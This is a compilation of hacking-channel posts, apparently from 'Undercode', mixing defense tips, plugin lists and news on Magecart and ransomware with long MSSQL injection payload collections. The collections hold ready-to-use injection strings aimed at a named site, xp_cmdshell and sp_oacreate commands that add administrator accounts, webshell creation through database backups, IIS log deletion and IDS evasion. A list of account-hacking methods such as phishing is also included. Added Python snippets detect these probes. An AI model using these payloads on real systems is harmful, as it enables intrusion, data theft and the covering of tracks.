Forwarded from WEB UNDERCODE - PRIVATE
Web server attack defense solution by Undercode:
> static page
Dynamic pages open slowly because they repeatedly pull large amounts of data from the database. For a CC (HTTP flood) attacker, even a few bots ("broilers") can consume all of a website's resources, so dynamic pages are vulnerable to CC attacks. Normally a static page is only tens of KB, while a dynamic page may have to query a database of tens of MB, so the difference in consumption is obvious. Forums usually need a good server to run stably, because it is very difficult to make a forum purely static.
> Hide server ip
Using CDN acceleration can hide the server's real IP, so the attacker cannot target the real IP directly; but this only stops some attackers, unless the real IP is genuinely hidden.
> Prohibit proxy access
As mentioned earlier, attackers use a large number of proxies. Configuring the server to refuse proxy access, or to limit the number of connections from proxies, also offers some protection.
> Block attack ip
When a server is under CC attack there are usually thousands of TCP connections. Open cmd and run netstat -an; if a large number of external IPs appear, the server is under attack. At that point you can block the attacking IPs with protection software or by hand. This method is common but passive.
> Use protection software
I personally think the usefulness of protection software is minimal and that it can only stop small attacks. Much software claims to identify attack methods effectively and intercept them, but most CC attacks can be disguised as normal users, and they can also be disguised with Baidu/Google spider user agents. During an attack the protection software has to analyze a large number of requests, which increases the memory it occupies, becomes a burden, and can even crash the software itself.
ENJOY
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
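The "Block attack ip" step above is judged by eye from netstat output. As an added example (not Undercode's code), the script below parses Windows-style `netstat -an` output, counts active web-port connections per external IP, and returns a Windows firewall rule for any IP above a threshold; the sample output, the threshold of 50 and the ports 80/443 are assumptions.

```python
"""Count TCP connections per remote IP from `netstat -an` output.

Added example (not Undercode's code). The post says to run `netstat -an`
and look for "a large number of external ips"; this parses such output,
counts web-port connections per remote address and flags the heavy ones.
The sample output below is constructed, not captured; the threshold (50),
the web ports and the internal ranges are assumptions.
"""
import ipaddress
from collections import Counter

WEB_PORTS = {80, 443}                              # assumption: ports the site serves
ACTIVE_STATES = {"ESTABLISHED", "SYN_RECEIVED"}    # states that hold server resources
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def split_host_port(addr):
    """Split '203.0.113.10:80' or '[::1]:443' into (host, port or None)."""
    host, _, port = addr.rpartition(":")
    host = host.strip("[]")
    try:
        return host, int(port)
    except ValueError:          # '*:*' in UDP rows has no numeric port
        return host, None


def parse_netstat(text):
    """Return (proto, local_host, local_port, remote_host, remote_port, state)
    for every TCP/UDP row of Windows-style `netstat -an` output."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("TCP", "UDP"):
            continue                                # header, blank and title lines
        lhost, lport = split_host_port(parts[1])
        rhost, rport = split_host_port(parts[2])
        state = parts[3] if len(parts) > 3 else ""  # UDP rows carry no state
        rows.append((parts[0], lhost, lport, rhost, rport, state))
    return rows


def is_external(host):
    """True for addresses outside the internal ranges; non-IP tokens are False."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return not ip.is_unspecified and not any(ip in net for net in INTERNAL_NETS)


def count_by_remote_ip(rows, ports=WEB_PORTS):
    """Active TCP connections to the web ports, counted per external remote IP."""
    counts = Counter()
    for proto, _lhost, lport, rhost, _rport, state in rows:
        if proto == "TCP" and lport in ports and state in ACTIVE_STATES \
                and is_external(rhost):
            counts[rhost] += 1
    return counts


def suspicious_ips(counts, threshold=50):
    """Remote IPs holding at least `threshold` connections, busiest first."""
    return [ip for ip, n in counts.most_common() if n >= threshold]


def block_rule(ip):
    """Windows firewall command that would block the address (returned, not run)."""
    return (f'netsh advfirewall firewall add rule name="cc-block {ip}" '
            f"dir=in action=block remoteip={ip}")


def sample_output():
    """Constructed `netstat -an` output: one flooding client, two normal ones."""
    lines = ["", "Active Connections", "",
             "  Proto  Local Address          Foreign Address        State",
             "  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING",
             "  TCP    10.0.0.5:80            10.0.0.9:40001         ESTABLISHED",
             "  UDP    0.0.0.0:123            *:*"]
    lines += [f"  TCP    203.0.113.10:80        198.51.100.7:{50000 + i}     ESTABLISHED"
              for i in range(60)]
    lines += [f"  TCP    203.0.113.10:443       192.0.2.44:{60000 + i}       ESTABLISHED"
              for i in range(3)]
    return "\n".join(lines)


if __name__ == "__main__":
    counts = count_by_remote_ip(parse_netstat(sample_output()))
    for ip in suspicious_ips(counts):
        print(f"{ip}: {counts[ip]} connections -> {block_rule(ip)}")
```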
Joomla best 2020 plugins list:
https://extensions.joomla.org/extension/chronoforms/
https://extensions.joomla.org/extension/zoo/
https://extensions.joomla.org/extension/jch-optimize/
https://extensions.joomla.org/extension/dj-imageslider/
https://extensions.joomla.org/extension/jce/
https://extensions.joomla.org/extension/rsform-pro/
https://extensions.joomla.org/extension/admin-tools/
https://extensions.joomla.org/extension/modules-anywhere/
> firewall:
https://extensions.joomla.org/extension/rsfirewall/
> clean cache
https://extensions.joomla.org/extension/cache-cleaner/
> page builder
https://extensions.joomla.org/extension/sp-page-builder/
You can find many more, but these are the top Joomla plugins of 2020.
Korean hackers are plundering credit card details from online shoppers
#News
> Hackers associated with the notorious North Korean Lazarus group are breaking into online stores and stealing customers' credit card details when they visit the checkout page. These attacks, known as "webpage plundering" or "Magecart attacks", have been ongoing since May 2019 and have hit large retailers such as the international fashion chain Claire's.
> The Dutch cybersecurity company SanSec reported the attacks. It wrote that digital skimming technology has been growing since 2015 and, although traditionally used by Russian and Indonesian hacking groups, government-backed North Korean criminals are now intercepting credit card details in online stores.
> The attacks involve gaining access to an online store's back-end servers, usually by sending booby-trapped emails to employees to obtain their passwords. The hackers broke into the jewelry store Claire's website in April and June. Once a website is compromised, a malicious script is loaded on the checkout page and steals the credit card details as they are entered into the form. Once the transaction is completed, the intercepted data is sent to a collection server controlled by the group and sold on the dark web.
> The group has built a global infiltration network to profit from its skimming operations. This includes hijacking and reusing legitimate websites as cover for criminal activity and for moving stolen assets. A model agency in Milan, an antique music store in Tehran and a family-run bookstore in New Jersey are all part of the network.
> Sansec researchers found a link between this activity and previous North Korean hacking operations. The evidence points to Hidden Cobra, also known as the Lazarus Group, which was behind the 2014 Sony Pictures hack and the 2016 Bangladesh Bank robbery and is widely regarded as the originator of the WannaCry malware.
VULNERABILITIES FOR BEGINNERS
The "violent database" (database path disclosure) vulnerability is rare now, but there are still many sites that have it and can be exploited. It works by submitting certain characters so that the site reveals the address of its database file; the file can then be downloaded, which is equivalent to taking the website's most important asset: the database contains all of the website's information, including the data of all its users!
Injection vulnerability
This is the SQL injection vulnerability mentioned earlier. It is the most widely used and most damaging vulnerability.
Side note (attacking through a neighbouring site on the same server)
When we attack a site, it may be invulnerable. We can then find another site on the same server, break into that one, and use privilege escalation, sniffing and other methods to reach the site we actually want. For example, suppose you and I share a building. My home is very secure, but yours is full of holes. A thief wants to get into my home; he has watched it (that is, scanned it) and found nothing to exploit. Then he notices that your house is in the same building as mine and is easy to enter. He enters your house first, obtains the key to the whole building (server permission) through your house, and so naturally gets mine as well. Once he has the key, he can enter my home (website).
Social worker
If you search Baidu for "social worker", the results are about social work. The "social worker" we are talking about has nothing to do with that; its full name is social engineering, a technique that studies weaknesses of human nature in order to attack.
A few ways to hack an account
1. TX database
The TX (Tencent) database has been leaked, and the password is looked up in it.
2. Intranet capture
Sometimes the password can be intercepted by sniffing packets on the internal network. Xiaofeng has not tested this on QQ, but it seems unlikely now.
3. Phishing
Phishing software, phishing websites and so on imitate the official service to trick users into entering their account and password, which are then sent to the attacker's server.
(Have you ever seen, on the message board of someone's QQ Zone, "Why is your photo in someone else's space?" followed by a URL? Click it and you get a disguised QQ Zone page asking you to log in; once you log in, your space automatically posts countless ads.)
4. Social engineering
Password combinations are derived from what is known about the user.
5. Remote control
A remote-control tool comes online and then records keystrokes.
6. Brute force cracking
BEST FTP CLIENTS / SERVICES:
http://winscp.net/eng/index.php
https://cyberduck.io/
https://panic.com/transmit/
http://www.coffeecup.com/free-ftp/
https://sourceforge.net/projects/filezilla/
https://www.ipswitch.com/secure-information-and-file-transfer/wsftp-client
https://www.globalscape.com/cuteftp
Tellyouthepass ransomware attacked intranets with the EternalBlue attack module, and companies have been victimized
> The Tellyouthepass ransomware variant was found active during routine investigation of risky files. The attacker packages the exe with a compression tool and integrates the MS16-032 kernel privilege escalation exploit module and the EternalBlue intranet-spreading module into the ransomware package to achieve worm-like propagation across the intranet. If a company fails to patch these vulnerabilities in time, it may suffer serious losses.
> As we all know, the WannaCry incident was a network disaster created by ransomware using the EternalBlue vulnerability to spread like a worm. Fortunately, EternalBlue has been patched for more than three years now, and only a few Windows systems have not applied the fix.
> Checking the Bitcoin wallet address that Tellyouthepass uses for transactions shows many recent transactions, and the wallet's current balance is 0.69 Bitcoin. Because the ransomware encrypts files with RSA+AES, files encrypted by the virus cannot be decrypted for now.
> At the same time, ransomware with worm capabilities can easily spread widely across weak corporate intranets. We remind government and corporate organizations to stay highly vigilant.
#News
Steps to optimize a hard disk in Windows 10:
1. First click Settings.
2. Search for Control Panel in Settings and open it.
3. In Control Panel, choose Large icons or Small icons as the view, then select Administrative Tools.
4. In Administrative Tools, select Defragment and Optimize Drives.
5. Select the disk that needs to be defragmented and optimized, and click Optimize.
6. You can also enable scheduled optimization here: just click to turn it on.
7. Then choose the optimization frequency and the drives to be optimized.
8. Then select Run on a schedule, and the automatic optimization is set up.
SQL manual injection statements (a complete collection of manual injection payloads)
Look at the following:
1. Determine whether injection exists
; and 1=1
; and 1=2
2. Preliminarily determine whether it is MSSQL
; and user>0
3. Determine the database system
; and (select count(*) from sysobjects)>0   (mssql)
; and (select count(*) from msysobjects)>0   (access)
4. When the injected parameter is a string: ' and [query condition] and ''='
5. When the search parameter is not filtered: ' and [query condition] and '%25'='
6. Guess the database
; and (select count(*) from [database name])>0
7. Guess the field
; and (select count(field name) from database name)>0
8. Guess the length of the record in the field
; and (select top 1 len(field name) from database name)>0
9. (1) Guess the ASCII value of the field (access)
; and (select top 1 asc(mid(field name,1,1)) from database name)>0
(2) Guess the ASCII value of the field (mssql)
; and (select top 1 unicode(substring(field name,1,1)) from database name)>0
10. Test the permission structure (mssql)
; and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
; and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
; and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
; and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
; and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
; and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
; and 1=(select IS_MEMBER('db_owner'));--
11. Add MSSQL and system accounts
; exec master.dbo.sp_addlogin username;--
; exec master.dbo.sp_password null,username,password;--
; exec master.dbo.sp_addsrvrolemember sysadmin username;--
; exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
; exec master.dbo.xp_cmdshell 'net user username password /add';--
; exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
12. (1) Traverse directories
; create table dirs(paths varchar(100), id int)
; insert dirs exec master.dbo.xp_dirtree 'c:\'
; and (select top 1 paths from dirs)>0
; and (select top 1 paths from dirs where paths not in('the paths obtained in the previous step'))>0
(2) Traverse the directory
; create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
; insert temp exec master.dbo.xp_availablemedia;--   get all current drives
; insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--   get the list of subdirectories
; insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--   get the directory tree of all subdirectories
; insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--   view the contents of the file
13. Stored procedures for the MSSQL registry
xp_regenumvalues root key, subkey
; exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'   returns all values under the key, in multiple record sets
xp_regread root key, subkey, value name
; exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'   returns the value of the specified key
xp_regwrite root key, subkey, value name, value type, value
There are two value types: REG_SZ is a string and REG_DWORD is an integer.
; exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName','reg_sz','hello'   writes to the registry
xp_regdeletevalue root key, subkey, value name
; exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName'   deletes a value
; exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'   deletes the key, including all values under it
14. Creating a webshell with an MSSQL backup
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='c:\l.asp';
15. MSSQL built-in functions
; and (select @@version)>0   obtains the version number of Windows
; and user_name()='dbo'   determines whether the current connected user is sa
; and (select user_name())>0   reveals the current connected user
; and (select db_name())>0   gets the currently connected database
16. Simple webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');
backup database model to disk='g:\wwwtest\l.asp';
When requesting it, use it like this:
http://ip/l.asp?c=dir
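Items 1 to 5 above (and the sysobjects check in item 3) only work because the request parameter is pasted straight into the SQL text. As an added example (not from the post), the following SQLite script puts that vulnerable lookup beside a parameterized one so a defender can see which code pattern to fix; the article table is constructed, and sqlite_master stands in for MSSQL's sysobjects.

```python
"""Vulnerable string-built query beside a parameterized one.

Added example (not from the post). Items 1 to 5 infer the truth of an
injected condition from whether the page still returns its row; that only
works when the parameter is concatenated into the SQL text. This uses
SQLite with a constructed `article` table; `sqlite_master` stands in for
MSSQL's `sysobjects`. The function names and probe values are assumptions.
"""
import sqlite3


def make_db():
    """In-memory database with a small constructed article table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table article(id integer primary key, title text)")
    conn.executemany("insert into article(id, title) values (?, ?)",
                     [(6, "six"), (7, "seven")])
    return conn


def lookup_vulnerable(conn, raw_id):
    """The pattern the probes target: the request value becomes part of the SQL."""
    sql = "select title from article where id=" + raw_id
    return [row[0] for row in conn.execute(sql)]


def lookup_hardened(conn, raw_id):
    """Validate the type, then bind the value; the SQL text never changes."""
    try:
        article_id = int(raw_id)
    except ValueError:
        raise ValueError("id must be an integer")
    rows = conn.execute("select title from article where id=?", (article_id,))
    return [row[0] for row in rows]


def search_vulnerable(conn, raw_title):
    """String parameter built the same way; items 4 and 5 aim at this form."""
    sql = "select title from article where title='" + raw_title + "'"
    return [row[0] for row in conn.execute(sql)]


def search_hardened(conn, raw_title):
    """Bound parameter: a quote in the input is just a character in the title."""
    rows = conn.execute("select title from article where title=?", (raw_title,))
    return [row[0] for row in rows]


def probe(conn, lookup, raw):
    """Run one probe value through a lookup; 'rejected' if the input was refused."""
    try:
        return lookup(conn, raw)
    except ValueError:
        return "rejected"


PROBES = [
    "6 and 1=1",                                      # item 1: true condition keeps the row
    "6 and 1=2",                                      # item 1: false condition drops it
    "6 and (select count(*) from sqlite_master)>0",   # item 3, with sqlite_master
]

if __name__ == "__main__":
    db = make_db()
    for raw in PROBES:
        print(f"{raw!r:50} vulnerable={probe(db, lookup_vulnerable, raw)} "
              f"hardened={probe(db, lookup_hardened, raw)}")
    for raw in ["six' and ''='", "six' and '1'='2"]:        # items 4 and 5
        print(f"{raw!r:50} vulnerable={probe(db, search_vulnerable, raw)} "
              f"hardened={probe(db, search_hardened, raw)}")
```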
HACKING WEBSITE EXAMPLE BY UNDERCODE:
#expertsTips
SQL Server
Determine whether injection is possible:
http://www.exehack.net/article.asp?id=6
http://www.exehack.net/article.asp?id=6'
http://www.exehack.net/article.asp?id=6 and 1=1
http://www.exehack.net/article.asp?id=6 and 1=2
http://www.exehack.net/article.asp?action=value' and 1=1
http://www.exehack.net/article.asp?action=value' and 1=2
searchpoints%' and 1=1
searchpoints%' and 1=2
Determine the database type:
http://www.exehack.net/article.asp?id=6 and user>0
http://www.exehack.net/article.asp?id=6 and (select count(*) from sysobjects)>0
Query the current user's data information:
article.asp?id=6 having 1=1--
Columns in the current table:
article.asp?id=6 group by admin.username having 1=1--
article.asp?id=6 group by admin.username,admin.password having 1=1--
Any table and column:
and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1
and (select top 1 col_name(object_id('admin'),N) from sysobjects)>1
Dump database data:
and (select top 1 password from admin where id=N)>1
Modify data in the database:
;update admin set password='oooooo' where username='xxx'
Add data to the database:
;insert into admin values (xxx,oooooo)--
Delete a database:
;drop database webdata
Obtain the current database user name: and user>0
Obtain the current database name: and db_name()>0
Obtain the database version: and (select @@version)>0
Determine whether multiple statements are supported: ;declare @a int--
Determine whether sub-queries are supported: and (select count(1) from [sysobjects])>=0
The database's extended stored procedure: exec master..xp_cmdshell
View the server's C drive directory: ;exec master..xp_cmdshell 'dir c:\'
Determine whether the extended stored procedure exists: and (select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')>0
Restore the extended stored procedure: ;exec sp_addextendedproc xp_cmdshell,'xplog70.dll'
Delete the extended stored procedure: ;exec sp_dropextendedproc 'xp_cmdshell'
MSSQL 2000 provides some functions for indirect access to OLE objects, which can be used to obtain permissions:
;declare @s int
;exec sp_oacreate 'wscript.shell',@s
;exec master..sp_oamethod @s,'run',null,'cmd.exe /c dir c:\'
Determine whether the current database user has higher permissions:
and 1=(select is_srvrolemember('sysadmin'))
and 1=(select is_srvrolemember('serveradmin'))
and 1=(select is_srvrolemember('setupadmin'))
and 1=(select is_srvrolemember('securityadmin'))
and 1=(select is_srvrolemember('diskadmin'))
and 1=(select is_srvrolemember('bulkadmin'))
Determine whether the current database user is DB_OWNER:
and 1=(select is_member('db_owner'))
SQL Server stores information about all databases in the master.dbo.sysdatabases table; PUBLIC permission is enough to SELECT from it:
and (select top 1 name from master.dbo.sysdatabases order by dbid)>0
and (select top 1 name from master.dbo.sysdatabases where name not in(select top 1 name from master.dbo.sysdatabases order by dbid) order by dbid)>0
Delete log records:
;exec master.dbo.xp_cmdshell 'del c:\winnt\system32\logfiles\w3svc5\ex070606.log >c:\temp.txt'
Replace the log record:
;exec master.dbo.xp_cmdshell 'copy c:\winnt\system32\logfiles\w3svc5\ex070404.log c:\winnt\system32\logfiles\w3svc5\ex070606.log >c:\temp.txt'
Get the web path:
;declare @shell int
;exec master..sp_oacreate 'wscript.shell',@shell out
;exec master..sp_oamethod @shell,'run',null,'cmd.exe /c dir /s d:/index.asp >c:/log.txt'
Use xp_cmdshell to search:
;exec master..xp_cmdshell 'dir /s d:/index.asp'
Command to display the server's website configuration information:
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/1/root
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/2/root
Use xp_regread with PUBLIC permission:
;exec master.dbo.xp_regread
hkey_local_machine,
'system\currentcontrolset\services\w3svc\parameters\virtual roots\'
'/'
For more advanced SQL Server techniques, refer to chapter five of Script Hacker by Zeng Yunhao.
3. DSqlHelper
Detect SYSADMIN authority:
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
(likewise for serveradmin, setupadmin, securityadmin, diskadmin, bulkadmin, and db_owner.)
Check XP_CMDSHELL (CMD command):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_cmdshell')
Check XP_REGREAD (registry read function):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_regread')
Check SP_MAKEWEBTASK (backup function):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='sp_makewebtask')
Check SP_ADDEXTENDEDPROC:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='sp_addextendedproc')
Check XP_SUBDIRS (read subdirectories):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_subdirs')
Check XP_DIRTREE (read subdirectories):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_dirtree')
Modify content:
;update table set field=content where 1=1
XP_CMDSHELL detection:
;exec master..xp_cmdshell 'dir c:\'
Repair XP_CMDSHELL:
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'
Add user hacker with XP_CMDSHELL:
;exec master.dbo.xp_cmdshell 'net user hacker 123456 /add'
Add user hacker to the administrators group with XP_CMDSHELL:
;exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'
Create table test:
;create table [dbo].[test] ([dstr][char](255));
Test whether table test exists:
and exists (select * from test)
Read the location of the web root (from the registry):
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into test (dstr) values(@result);--
Dump the absolute path of the web root (error-based):
and 1=(select count(*) from test where dstr>1)
Delete table test:
;drop table test;
Create table dirs for viewing directories:
;create table dirs(paths varchar(100), id int)
Add the directory listing to table dirs:
;insert dirs exec master.dbo.xp_dirtree 'c:\'
Dump the contents of dirs:
and 0<>(select top 1 paths from dirs)
Back up the current database:
;declare @a sysname; set @a=db_name();backup database @a to disk='c:\inetpub\wwwroot\down.bak';
Drop table dirs:
;drop table dirs;
Create table temp:
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));
Add the drive list to the temp table:
;insert temp exec master.dbo.xp_availablemedia;
Delete table temp:
;delete from temp;
Create table dirs:
;create table dirs(paths varchar(100), id int);
Get the subdirectory list with XP_SUBDIRS:
;insert dirs exec master.dbo.xp_subdirs 'c:\';
Dump the contents (error-based):
and 0<>(select top 1 paths from dirs)
Delete table dirs:
;delete from dirs;
Create table dirs:
;create table dirs(paths varchar(100), id int)
Use XP_CMDSHELL to view the contents of the directory:
;insert dirs exec master..xp_cmdshell 'dir c:\'
Delete table dirs:
;delete from dirs;
Check SP_OACREATE (execute command):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='sp_oacreate')
SP_OACREATE executes a CMD command:
;DECLARE @shell INT EXEC sp_oacreate 'wscript.shell',@shell OUTPUT EXEC sp_oamethod @shell,'run',null,'C:\WINNT\system32\cmd.exe /c net user hacker 123456 /add'
SP_OACREATE creates a directory:
;DECLARE @shell INT EXEC sp_oacreate 'wscript.shell',@shell OUTPUT EXEC sp_oamethod @shell,'run',null,'C:\WINNT\system32\cmd.exe /c md c:\inetpub\wwwroot\1111'
Create a virtual directory for the E drive:
;declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "default Web site" -v "e","e:\"'
Set virtual directory E to readable:
;declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'
Start the SERVER service:
;exec master..xp_servicecontrol 'start','server'
Bypass IDS detection of XP_CMDSHELL:
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
Open remote database 1:
;select * from OPENROWSET('SQLOLEDB','server=servername;uid=sa;pwd=apachy_123','select * from table1')
Open remote database 2:
;select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;','select * from table')
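The probes and procedure calls listed in this post leave recognisable traces in the web server's request log. As an added example that is not part of the original post, the following Python scans constructed IIS-style log lines for them, URL-decoding each query string and undoing the 'xp_'+'cmdshell' string splitting used above to slip past IDS signatures; the log lines, the field layout and the rule names are assumptions.

```python
from __future__ import annotations
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines (not from the original post). Assumed
# field layout: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2024-01-01 10:00:01 203.0.113.5 GET /article.asp id=6 200
2024-01-01 10:00:02 203.0.113.5 GET /article.asp id=6+and+1%3D1 200
2024-01-01 10:00:03 203.0.113.5 GET /article.asp id=6+and+1%3D2 200
2024-01-01 10:00:04 203.0.113.5 GET /article.asp id=6;exec+master..xp_cmdshell+'dir+c:\\' 500
2024-01-01 10:00:05 203.0.113.5 GET /article.asp id=6;declare+@a+sysname+set+@a%3D'xp_'%2B'cmdshell'+exec+@a+'dir' 500
2024-01-01 10:00:06 198.51.100.7 GET /article.asp id=42 200
"""

# Indicators drawn from the probes listed in the post; the rule names are my own.
RULES = {
    "boolean-probe": re.compile(r"\band\s+\d+\s*=\s*\d+\b", re.I),
    "stacked-exec": re.compile(r";\s*exec\b", re.I),
    "xp-proc": re.compile(r"\bxp_(cmdshell|regread|dirtree|subdirs|servicecontrol|availablemedia)\b", re.I),
    "ole-automation": re.compile(r"\bsp_oa(create|method)\b", re.I),
    "openrowset": re.compile(r"\bopenrowset\s*\(", re.I),
    "catalog-probe": re.compile(r"\b(sysobjects|sysdatabases|is_srvrolemember|is_member)\b", re.I),
}

def normalize(query: str) -> str:
    """URL-decode, strip inline comments, and rejoin 'xp_'+'cmdshell' style
    string splitting so the concatenated name hits the same rule as the plain one."""
    q = unquote_plus(query)
    q = re.sub(r"/\*.*?\*/", " ", q)
    q = re.sub(r"'\s*\+\s*'", "", q)
    return re.sub(r"\s+", " ", q)

def scan_log(text: str) -> list[tuple[str, list[str]]]:
    """Return (log line, [matched rule names]) for every line that hits a rule."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue  # malformed or header line
        names = [name for name, rx in RULES.items() if rx.search(normalize(fields[5]))]
        if names:
            hits.append((line, names))
    return hits
```

Lines 2 to 5 of the sample are flagged (the two boolean probes, the stacked xp_cmdshell call, and the split-string variant), while the two ordinary lookups are not.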
ENJOY
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking